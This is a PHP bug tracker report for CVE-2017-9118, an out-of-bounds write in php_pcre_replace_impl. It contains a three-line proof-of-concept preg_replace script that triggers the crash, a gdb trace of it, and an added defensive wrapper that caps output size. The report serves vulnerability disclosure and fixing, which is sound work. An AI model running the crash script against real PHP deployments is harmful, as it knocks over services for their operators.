Bug #74604 Out of bounds in php_pcre_replace_impl
Submitted: 2017-05-17 09:12 UTC Modified: 2018-12-08 11:20 UTC
Votes: 1
Avg. Score: 5.0 ± 0.0
Reproduced: 1 of 1 (100.0%)
Same Version: 0 (0.0%)
Same OS: 0 (0.0%)
From: whitehat002 at hotmail dot com Assigned:
Status: Open Package: PCRE related
PHP Version: 7.1.5 OS:
Private report: No CVE-ID: 2017-9118

 [2017-05-17 09:12 UTC] whitehat002 at hotmail dot com
Description:
------------
It seems to be an out of bounds bug.

Test script:
---------------
<?php
// PoC as posted: lift the memory limit so a ~2 GiB replacement string can be
// built, then apply it to 18 matches of "A"; the copy loop at
// php_pcre.c:1317 (*walkbuf++ = *walk++) then writes past the result buffer.
ini_set('memory_limit', -1);
$str = str_repeat("A", 0x7ffffffe);
preg_replace("/A/i", $str, "AAAAAAAAAAAAAAAAAA");


Expected result:
----------------
no crash

Actual result:
--------------
root@hackyzh-virtual-machine:~# gdb -q --args ./php-7.1.5/sapi/cli/php -n poc2.php 
Reading symbols from /root/php-7.1.5/sapi/cli/php...done.
gdb-peda$ r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x36dfdfb0 ('A' <repeats 200 times>...)
EBX: 0xb7200000 
ECX: 0x0 
EDX: 0x41 ('A')
ESI: 0x41 ('A')
EDI: 0xb6c0000d --> 0x0 
EBP: 0xbfffbf98 --> 0xb7013100 ('A' <repeats 200 times>...)
ESP: 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...)
EIP: 0x8106c7d (<php_pcre_replace_impl+941>:	mov    BYTE PTR [ebx],dl)
EFLAGS: 0x210293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8106c75 <php_pcre_replace_impl+933>:	
    jne    0x8106cb8 <php_pcre_replace_impl+1000>
   0x8106c77 <php_pcre_replace_impl+935>:	mov    eax,DWORD PTR [ebp-0x24]
   0x8106c7a <php_pcre_replace_impl+938>:	movzx  edx,BYTE PTR [eax]
=> 0x8106c7d <php_pcre_replace_impl+941>:	mov    BYTE PTR [ebx],dl
   0x8106c7f <php_pcre_replace_impl+943>:	lea    edx,[eax+0x1]
   0x8106c82 <php_pcre_replace_impl+946>:	add    ebx,0x1
   0x8106c85 <php_pcre_replace_impl+949>:	mov    DWORD PTR [ebp-0x24],edx
   0x8106c88 <php_pcre_replace_impl+952>:	movzx  esi,BYTE PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...)
0004| 0xbfffbe94 --> 0xb7068048 ('A' <repeats 200 times>...)
0008| 0xbfffbe98 --> 0x0 
0012| 0xbfffbe9c --> 0x20 (' ')
0016| 0xbfffbea0 --> 0x0 
0020| 0xbfffbea4 --> 0x0 
0024| 0xbfffbea8 --> 0xbfffbeb0 --> 0x0 
0028| 0xbfffbeac --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
php_pcre_replace_impl (pce=0x8bb1b30, subject_str=0xb7068038, 
    subject=0xb7068048 'A' <repeats 200 times>..., subject_len=0x20, 
    replace_val=0xb7013110, is_callable_replace=0x0, limit=0xffffffff, 
    replace_count=0xbfffc08c) at /root/php-7.1.5/ext/pcre/php_pcre.c:1317
1317						*walkbuf++ = *walk++;
gdb-peda$ x/s $ebx
0xb7200000:	 <Address 0xb7200000 out of bounds>
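As an added defensive example (not part of the report or of PHP's own code), a wrapper that estimates the output size of preg_replace() before calling it, so an oversized replacement like the one in the test script is rejected instead of copied on a 32-bit build. It assumes a literal replacement without backreferences; the function names and the bound are assumptions.

```php
<?php
// Added defensive example, not code from the bug report or from PHP itself.
// Estimate the result length of preg_replace() up front and refuse inputs
// whose result could not fit a 32-bit size, the condition the PoC drives.
// Assumes a literal replacement (no $1 / \1 backreferences); the names and
// the bound MAX_RESULT_LEN are hypothetical.

const MAX_RESULT_LEN = 0x7fffffff; // largest length a 32-bit int can hold

// Estimate strlen(preg_replace($pattern, <$replLen-byte replacement>, $subject, $limit))
// using float arithmetic so the multiplication cannot silently wrap.
function projected_replace_length(string $pattern, int $replLen, string $subject, int $limit = -1): float
{
    $count = preg_match_all($pattern, $subject, $m, PREG_SET_ORDER);
    if ($count === false) {
        throw new RuntimeException('preg_match_all failed, error ' . preg_last_error());
    }
    if ($limit >= 0 && $count > $limit) {
        $count = $limit; // preg_replace stops after $limit replacements
    }
    $removed = 0; // bytes of matched text that the replacement displaces
    foreach (array_slice($m, 0, $count) as $match) {
        $removed += strlen($match[0]);
    }
    return (float) (strlen($subject) - $removed) + (float) $count * $replLen;
}

function safe_preg_replace(string $pattern, string $replacement, string $subject, int $limit = -1): ?string
{
    $needed = projected_replace_length($pattern, strlen($replacement), $subject, $limit);
    if ($needed > MAX_RESULT_LEN) {
        throw new LengthException(sprintf('preg_replace refused: result would be %.0f bytes', $needed));
    }
    return preg_replace($pattern, $replacement, $subject, $limit);
}

// Constructed check mirroring the PoC's numbers without allocating 2 GiB:
// 18 matches of "A" times a 0x7ffffffe-byte replacement is roughly 36 GiB.
$poc = projected_replace_length('/A/i', 0x7ffffffe, str_repeat('A', 18));
printf("PoC would need %.0f bytes (limit %d)\n", $poc, MAX_RESULT_LEN);

// An ordinary call passes the check and behaves like preg_replace().
var_dump(safe_preg_replace('/A/i', 'b', 'AAA'));
```

Leaving memory_limit at its default also blocks this PoC, since str_repeat() cannot then allocate the 2 GiB replacement it depends on.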

History

 [2017-05-23 01:26 UTC] whitehat002 at hotmail dot com
Has anyone responded to this bug?
 [2017-06-20 06:18 UTC] stas@php.net
-Type: Security +Type: Bug
 [2018-08-03 03:35 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2017-9118
 [2018-12-08 11:20 UTC] cmb@php.net
If it's not a security issue, it shouldn't have a CVE.
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Wed Jun 19 11:01:29 2019 UTC